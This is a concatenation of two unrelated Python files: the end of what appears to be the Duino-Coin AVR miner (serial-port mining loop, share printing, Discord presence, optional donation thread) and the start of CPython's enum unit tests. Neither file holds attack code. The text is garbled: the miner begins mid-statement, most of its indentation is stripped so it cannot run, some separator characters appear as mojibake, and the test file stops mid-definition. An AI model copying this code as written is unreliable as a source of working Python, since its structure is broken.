+ Fore.YELLOW + str(donation_level))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('algorithm')
+ Style.BRIGHT + Fore.YELLOW
        + 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('rig_identifier')
+ Style.BRIGHT + Fore.YELLOW + rig_identifier)
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + str(greeting) + ', '
+ Style.BRIGHT + Fore.YELLOW
+ str(username) + '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
        # the updater thread is started from __main__ via
        # update_rich_presence(); nothing else needs launching here
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
            # mine_avr stores the smoothed rate in the global 'hashrate';
            # accept either a single float or a per-thread dict
            rates = (hashrate.values()
                     if isinstance(hashrate, dict) else [hashrate])
            total_hashrate = get_prefix("H/s", sum(rates), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
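# Sketch of the rich-presence flow used above (pypresence API as already
# imported by this script; the client id is the Discord application id):
#   RPC = Presence(808045598447632384)
#   RPC.connect()
#   RPC.update(details=..., state=..., buttons=[...])  # refreshed every 15 s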
def pretty_print(sender: str = "sys0",
msg: str = None,
state: str = "success"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("avr"):
bg_color = Back.MAGENTA
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ bg_color + Style.BRIGHT + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type, accept, reject, total_hashrate,
computetime, diff, ping):
"""
Produces nicely formatted CLI output for shares:
    HH:MM:S |avrN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ∙ diff 0 k ∙ ping 0ms
"""
try:
diff = get_prefix("", int(diff), 0)
except:
diff = "?"
try:
total_hashrate = get_prefix("H/s", total_hashrate, 2)
except:
total_hashrate = "? H/s"
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + Back.MAGENTA + Fore.RESET
+ " avr" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " โ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " โ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} โ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def mine_avr(com, threadid, fastest_pool):
global hashrate
start_time = time()
report_shares = 0
while True:
while True:
try:
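                # on the first pass 'ser' is not bound yet; the bare
                # except below turns this close-and-reopen into a no-op then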
ser.close()
pretty_print('sys' + port_num(com),
f"Closed COM port {com}", 'success')
sleep(2)
except:
pass
try:
ser = Serial(com, baudrate=int(Settings.BAUDRATE),
timeout=float(Settings.AVR_TIMEOUT))
"""
Sleep after opening the port to make
sure the board resets properly after
receiving the DTR signal
"""
sleep(2)
break
except Exception as e:
pretty_print(
'sys'
+ port_num(com),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ f' (avr connection err: {e})',
'error')
sleep(10)
retry_counter = 0
while True:
try:
if retry_counter > 3:
fastest_pool = Client.fetch_pool()
retry_counter = 0
debug_output(f'Connecting to {fastest_pool}')
s = Client.connect(fastest_pool)
server_version = Client.recv(s, 6)
if threadid == 0:
if float(server_version) <= float(Settings.VER):
pretty_print(
'net0', get_string('connected')
+ Style.NORMAL + Fore.RESET
+ get_string('connected_server')
+ str(server_version) + ")",
'success')
else:
pretty_print(
'sys0', f' Miner is outdated (v{Settings.VER}) -'
+ get_string('server_is_on_version')
+ server_version + Style.NORMAL
+ Fore.RESET + get_string('update_warning'),
'warning')
sleep(10)
Client.send(s, "MOTD")
motd = Client.recv(s, 1024)
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: " + Fore.RESET
+ Style.NORMAL + str(motd),
"success")
break
except Exception as e:
pretty_print('net0', get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error')
retry_counter += 1
sleep(10)
pretty_print('sys' + port_num(com),
get_string('mining_start') + Style.NORMAL + Fore.RESET
+ get_string('mining_algorithm') + str(com) + ')',
'success')
while True:
try:
debug_output(com + ': Requesting job')
Client.send(s, 'JOB'
+ Settings.SEPARATOR
+ str(username)
+ Settings.SEPARATOR
+ 'AVR')
job = Client.recv(s, 128).split(Settings.SEPARATOR)
debug_output(com + f": Received: {job[0]}")
try:
diff = int(job[2])
except:
pretty_print("sys" + port_num(com),
f" Node message: {job[1]}", "warning")
sleep(3)
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
sleep(3)
break
retry_counter = 0
while True:
if retry_counter > 3:
break
try:
debug_output(com + ': Sending job to the board')
ser.write(bytes(str(job[0]
+ Settings.SEPARATOR
+ job[1]
+ Settings.SEPARATOR
+ job[2]
+ Settings.SEPARATOR),
encoding=Settings.ENCODING))
debug_output(com + ': Reading result from the board')
result = ser.read_until(b'\n').decode().strip().split(',')
ser.flush()
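                    # Expected reply is a single comma-separated line from
                    # the board, roughly "<result>,<elapsed_us>,<chip id>"
                    # (field meanings inferred from how result[0..2] are
                    # used below; result[0] and result[1] arrive as
                    # base-2 strings).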
if result[0] and result[1]:
_ = int(result[0], 2)
debug_output(com + f': Result: {result[0]}')
break
else:
raise Exception("No data received from AVR")
except Exception as e:
debug_output(com + f': Retrying data read: {e}')
retry_counter += 1
continue
try:
computetime = round(int(result[1], 2) / 1000000, 3)
num_res = int(result[0], 2)
hashrate_t = round(num_res / computetime, 2)
hashrate_mean.append(hashrate_t)
hashrate = mean(hashrate_mean[-5:])
except Exception as e:
pretty_print('sys' + port_num(com),
get_string('mining_avr_connection_error')
+ Style.NORMAL + Fore.RESET
+ ' (no response from the board: '
+ f'{e}, please check the connection, '
+ 'port setting or reset the AVR)', 'warning')
break
try:
Client.send(s, str(num_res)
+ Settings.SEPARATOR
+ str(hashrate_t)
+ Settings.SEPARATOR
+ f'Official AVR Miner {Settings.VER}'
+ Settings.SEPARATOR
+ str(rig_identifier)
+ Settings.SEPARATOR
+ str(result[2]))
                    responsetimestart = now()
                    feedback = Client.recv(s, 64)
                    responsetimestop = now()
                    time_delta = (responsetimestop -
                                  responsetimestart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
diff = get_prefix("", int(diff), 0)
debug_output(com + f': retrieved feedback: {feedback}')
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
debug_output(com + f': error parsing response: {e}')
sleep(5)
break
if feedback == 'GOOD':
shares[0] += 1
share_print(port_num(com), "accept",
shares[0], shares[1], hashrate,
computetime, diff, ping)
elif feedback == 'BLOCK':
shares[0] += 1
share_print(port_num(com), "block",
shares[0], shares[1], hashrate,
computetime, diff, ping)
else:
shares[1] += 1
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping)
title(get_string('duco_avr_miner') + str(Settings.VER)
+ f') - {shares[0]}/{(shares[0] + shares[1])}'
+ get_string('accepted_shares'))
end_time = time()
elapsed_time = end_time - start_time
if threadid == 0 and elapsed_time >= Settings.REPORT_TIME:
report_shares = shares[0] - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time, end_time, report_shares,
hashrate, uptime)
start_time = time()
def periodic_report(start_time, end_time, shares,
hashrate, uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" " + get_string('periodic_mining_report')
+ Fore.RESET + Style.NORMAL
+ get_string('report_period')
+ str(seconds) + get_string('report_time')
+ get_string('report_body1')
+ str(shares) + get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3') + get_string('report_body4')
+ str(int(hashrate)) + " H/s" + get_string('report_body5')
+ str(int(hashrate*seconds)) + get_string('report_body6')
+ get_string('total_mining_time') + str(uptime), "success")
def calculate_uptime(start_time):
    # the original elif chain tested 'uptime >= 60' before the hour
    # branches, so hours were unreachable; order the ranges instead
    uptime = time() - start_time
    if uptime < 60:
        return str(round(uptime)) + get_string('uptime_seconds')
    elif uptime < 3600:
        minutes = int(uptime // 60)
        return str(minutes) + get_string(
            'uptime_minute' if minutes == 1 else 'uptime_minutes')
    else:
        hours = int(uptime // 3600)
        return str(hours) + get_string(
            'uptime_hour' if hours == 1 else 'uptime_hours')
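# Illustrative outputs (suffix strings come from get_string):
#   calculate_uptime(time() - 42)    -> "42" + uptime_seconds
#   calculate_uptime(time() - 300)   -> "5"  + uptime_minutes
#   calculate_uptime(time() - 7200)  -> "2"  + uptime_hours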
if __name__ == '__main__':
init(autoreset=True)
title(f"{get_string('duco_avr_miner')}{str(Settings.VER)})")
try:
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0', get_string('load_config_error')
+ Settings.DATA_DIR + get_string('load_config_error_warning')
+ Style.NORMAL + Fore.RESET + f' ({e})', 'error')
debug_output(f'Error reading configfile: {e}')
sleep(10)
_exit(1)
try:
greeting()
debug_output('Greeting displayed')
except Exception as e:
debug_output(f'Error displaying greeting message: {e}')
if donation_level > 0:
try:
Donate.load(donation_level)
Donate.start(donation_level)
except Exception as e:
debug_output(f'Error launching donation thread: {e}')
try:
fastest_pool = Client.fetch_pool()
threadid = 0
for port in avrport:
thrThread(target=mine_avr,
args=(port, threadid,
fastest_pool)).start()
threadid += 1
except Exception as e:
debug_output(f'Error launching AVR thread(s): {e}')
if discord_presence == "y":
try:
init_rich_presence()
thrThread(
target=update_rich_presence).start()
except Exception as e:
debug_output(f'Error launching Discord RPC thread: {e}')
|
test_enum.py
|
import enum
import doctest
import inspect
import os
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumType, Flag, IntFlag, unique, auto
from enum import STRICT, CONFORM, EJECT, KEEP
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(enum))
if os.path.exists('Doc/library/enum.rst'):
tests.addTests(doctest.DocFileSuite(
'../../Doc/library/enum.rst',
optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE,
))
return tests
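# load_tests is the unittest discovery hook: it adds enum's docstring
# examples and, when running from a source checkout that contains
# Doc/library/enum.rst, the documentation's doctests to this suite.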
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
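# Both helpers above exercise every pickle protocol (0..HIGHEST_PROTOCOL).
# Enum members round-trip by reference, so most callers below pass
# assertIs: loads(dumps(member)) should yield the very same object.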
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
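# Unlike the builtin property, classproperty's getter receives the owning
# class, so the value can be read off the class itself.  Hypothetical
# example (not part of the test suite):
#
#     class Demo:
#         @classproperty
#         def NAME_LENGTH(cls):
#             return len(cls.__name__)
#
#     Demo.NAME_LENGTH   # -> 4, no instance needed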
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), season)
self.assertEqual(repr(e), 'Season.{0}'.format(season))
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
'_sunder_ names, such as ._bad_., are reserved',
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
        self.assertEqual(format(Test2Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
def __repr__(self):
return '<%s.%s: %r>' % (self.__class__.__name__, self._name_, self._value_)
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
